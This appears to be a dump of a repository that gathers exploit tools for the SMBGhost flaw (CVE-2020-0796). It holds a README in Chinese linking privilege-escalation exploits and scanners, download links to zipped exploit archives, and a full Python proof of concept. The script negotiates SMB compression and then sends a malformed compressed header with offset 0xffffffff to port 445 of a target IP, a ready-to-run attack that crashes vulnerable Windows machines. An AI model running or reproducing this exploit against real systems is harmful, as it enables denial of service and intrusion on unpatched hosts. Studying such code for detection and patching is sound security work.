├── CVE-2020-0796-Checker-master.zip
├── CVE-2020-0796-LPE-EXP-master（EXE）.zip
├── CVE-2020-0796-LPE-POC-master.zip
├── CVE-2020-0796-POC.py
├── CVE-2020-0796-PoC-master.zip
├── CVE-2020-0796-master.zip
├── README.md
├── SMBGhost-master.zip
└── procexp.exe


/CVE-2020-0796-Checker-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/CVE-2020-0796-Checker-master.zip


--------------------------------------------------------------------------------
/CVE-2020-0796-LPE-EXP-master（EXE）.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/CVE-2020-0796-LPE-EXP-master（EXE）.zip


--------------------------------------------------------------------------------
/CVE-2020-0796-LPE-POC-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/CVE-2020-0796-LPE-POC-master.zip


--------------------------------------------------------------------------------
/CVE-2020-0796-POC.py:
--------------------------------------------------------------------------------
  1 | import socket, struct, sys
  2 | 
  3 | class Smb2Header:
  4 |     def __init__(self, command, message_id):
  5 |         self.protocol_id = "\xfeSMB"
  6 |         self.structure_size = "\x40\x00"  # Must be set to 0x40
  7 |         self.credit_charge = "\x00"*2
  8 |         self.channel_sequence = "\x00"*2
  9 |         self.channel_reserved = "\x00"*2
 10 |         self.command = command
 11 |         self.credits_requested = "\x00"*2  # Number of credits requested / granted
 12 |         self.flags = "\x00"*4
 13 |         self.chain_offset = "\x00"*4  # Points to next message
 14 |         self.message_id = message_id
 15 |         self.reserved = "\x00"*4
 16 |         self.tree_id = "\x00"*4  # Changes for some commands
 17 |         self.session_id = "\x00"*8
 18 |         self.signature = "\x00"*16
 19 | 
 20 |     def get_packet(self):
 21 |         return self.protocol_id + self.structure_size + self.credit_charge + self.channel_sequence + self.channel_reserved + self.command + self.credits_requested + self.flags + self.chain_offset + self.message_id + self.reserved + self.tree_id + self.session_id + self.signature
 22 | 
 23 | class Smb2NegotiateRequest:
 24 |     def __init__(self):
 25 |         self.header = Smb2Header("\x00"*2, "\x00"*8)
 26 |         self.structure_size = "\x24\x00"
 27 |         self.dialect_count = "\x08\x00"  # 8 dialects
 28 |         self.security_mode = "\x00"*2
 29 |         self.reserved = "\x00"*2
 30 |         self.capabilities = "\x7f\x00\x00\x00"
 31 |         self.guid = "\x01\x02\xab\xcd"*4
 32 |         self.negotiate_context = "\x78\x00"
 33 |         self.additional_padding = "\x00"*2
 34 |         self.negotiate_context_count = "\x02\x00"  # 2 Contexts
 35 |         self.reserved_2 = "\x00"*2
 36 |         self.dialects = "\x02\x02" + "\x10\x02" + "\x22\x02" + "\x24\x02" + "\x00\x03" + "\x02\x03" + "\x10\x03" + "\x11\x03"  # SMB 2.0.2, 2.1, 2.2.2, 2.2.3, 3.0, 3.0.2, 3.1.0, 3.1.1
 37 |         self.padding = "\x00"*4
 38 | 
 39 |     def context(self, type, length):
 40 |         data_length = length
 41 |         reserved = "\x00"*4
 42 |         return type + data_length + reserved
 43 | 
 44 |     def preauth_context(self):
 45 |         hash_algorithm_count = "\x01\x00"  # 1 hash algorithm
 46 |         salt_length = "\x20\x00"
 47 |         hash_algorithm = "\x01\x00"  # SHA512
 48 |         salt = "\x00"*32
 49 |         pad = "\x00"*2
 50 |         length = "\x26\x00"
 51 |         context_header = self.context("\x01\x00", length)
 52 |         return context_header + hash_algorithm_count + salt_length + hash_algorithm + salt + pad
 53 | 
 54 |     def compression_context(self):
 55 |         compression_algorithm_count = "\x03\x00"  # 3 Compression algorithms
 56 |         padding = "\x00"*2
 57 |         flags = "\x01\x00\x00\x00"
 58 |         algorithms = "\x01\x00" + "\x02\x00" + "\x03\x00"  # LZNT1 + LZ77 + LZ77+Huffman
 59 |         length = "\x0e\x00"
 60 |         context_header = self.context("\x03\x00", length)
 61 |         return context_header + compression_algorithm_count + padding + flags + algorithms
 62 | 
 63 |     def get_packet(self):
 64 |         padding = "\x00"*8
 65 |         return self.header.get_packet() + self.structure_size + self.dialect_count + self.security_mode + self.reserved + self.capabilities + self.guid + self.negotiate_context + self.additional_padding + self.negotiate_context_count + self.reserved_2 + self.dialects + self.padding + self.preauth_context() + self.compression_context() + padding
 66 | 
 67 | class NetBIOSWrapper:
 68 |     def __init__(self, data):
 69 |         self.session = "\x00"
 70 |         self.length = struct.pack('>i', len(data)).decode('latin1')[1:]
 71 |         self.data = data
 72 | 
 73 |     def get_packet(self):
 74 |         return self.session + self.length + self.data
 75 | 
 76 | class Smb2CompressedTransformHeader:
 77 |     def __init__(self, data):
 78 |         self.data = data
 79 |         self.protocol_id = "\xfcSMB"
 80 |         self.original_decompressed_size = struct.pack('<i', len(self.data)).decode('latin1')
 81 |         self.compression_algorithm = "\x01\x00"
 82 |         self.flags = "\x00"*2
 83 |         self.offset = "\xff\xff\xff\xff"  # Exploit the vulnerability
 84 | 
 85 |     def get_packet(self):
 86 |         return self.protocol_id + self.original_decompressed_size + self.compression_algorithm + self.flags + self.offset + self.data
 87 | 
 88 | def send_negotiation(sock):
 89 |     negotiate = Smb2NegotiateRequest()
 90 |     packet = NetBIOSWrapper(negotiate.get_packet()).get_packet()
 91 |     sock.send(packet.encode('latin1'))
 92 |     sock.recv(3000)
 93 | 
 94 | def send_compressed(sock, data):
 95 |     compressed = Smb2CompressedTransformHeader(data)
 96 |     packet = NetBIOSWrapper(compressed.get_packet()).get_packet()
 97 |     sock.send(packet.encode('latin1'))
 98 |     #sock.recv(1000)
 99 | 
100 | if __name__ == "__main__":
101 |     if len(sys.argv) != 2:
102 |         exit("[-] Supply an IP: {} IP_ADDR".format(sys.argv[0]))
103 |     sock = socket.socket(socket.AF_INET)
104 |     sock.settimeout(3)
105 |     sock.connect((sys.argv[1], 445))
106 |     send_negotiation(sock)
107 |     send_compressed(sock, "A" * 50)
108 | 


--------------------------------------------------------------------------------
/CVE-2020-0796-PoC-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/CVE-2020-0796-PoC-master.zip


--------------------------------------------------------------------------------
/CVE-2020-0796-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/CVE-2020-0796-master.zip


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2020-0796-SMB
 2 | 该资源为CVE-2020-0796漏洞复现，包括Python版本和C++版本。主要是集合了github大神们的资源，希望您喜欢~
 3 | 
 4 | 
 5 | - C++
 6 | 
 7 | 
 8 | - Python
 9 | 
10 | - EXP
11 | 
12 | - POC
13 | 
14 | 
15 | **漏洞利用：**
16 | - 本地EXP提权：[https://github.com/danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796)
17 | - 本地EXE提权: [https://github.com/f1tz/CVE-2020-0796-LPE-EXP](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)
18 | - POC版本提权： [https://github.com/eerykitty/CVE-2020-0796-PoC](https://github.com/eerykitty/CVE-2020-0796-PoC)
19 | - 漏洞扫描代码：[https://github.com/ollypwn/SMBGhost](https://github.com/ollypwn/SMBGhost)
20 | - Python POC版本：[https://github.com/ZecOps/CVE-2020-0796-LPE-POC](https://github.com/ZecOps/CVE-2020-0796-LPE-POC)
21 | - 漏洞检测工具：[https://github.com/joaozietolie/CVE-2020-0796-Checker](https://github.com/joaozietolie/CVE-2020-0796-Checker)
22 | - 作者收集工具：[https://github.com/eastmountyxz/CVE-2020-0796-SMB](https://github.com/eastmountyxz/CVE-2020-0796-SMB)
23 | 


--------------------------------------------------------------------------------
/SMBGhost-master.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/SMBGhost-master.zip


--------------------------------------------------------------------------------
/procexp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eastmountyxz/CVE-2020-0796-SMB/8255a9a85428608860524d494c08177e95477fb1/procexp.exe


--------------------------------------------------------------------------------